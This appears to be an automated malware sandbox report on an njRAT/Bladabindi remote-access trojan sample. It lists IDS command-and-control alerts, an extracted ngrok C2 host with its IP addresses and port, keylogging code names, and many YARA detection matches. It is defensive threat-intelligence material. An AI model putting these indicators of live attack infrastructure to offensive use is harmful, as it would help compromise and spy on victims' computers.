        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49712 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49713 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49715 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49716 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49717 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49718 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49719 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49720 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49721 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49722 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49723 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49724 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49725 -> 3.6.98.232:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49726 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49727 -> 3.6.122.107:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.11:49728 -> 3.6.115.182:19208
        Source: Malware configuration extractorURLs: 0.tcp.in.ngrok.io
        Source: global trafficTCP traffic: 3.6.122.107 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 3.6.115.182 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 3.6.98.232 ports 0,1,2,8,9,19208
        Source: global trafficTCP traffic: 192.168.2.11:49705 -> 3.6.122.107:19208
        Source: global trafficTCP traffic: 192.168.2.11:49720 -> 3.6.98.232:19208
        Source: global trafficTCP traffic: 192.168.2.11:49728 -> 3.6.115.182:19208
        Source: Joe Sandbox ViewIP Address: 3.6.122.107 3.6.122.107
        Source: Joe Sandbox ViewIP Address: 3.6.115.182 3.6.115.182
        Source: Joe Sandbox ViewIP Address: 3.6.98.232 3.6.98.232
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownDNS traffic detected: queries for: 0.tcp.in.ngrok.io

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, kl.cs.Net Code: VKCodeToUnicode
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, kl.cs.Net Code: VKCodeToUnicode

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR

        Operating System Destruction

        barindex
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: 01 00 00 00 Jump to behavior

        System Summary

        barindex
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
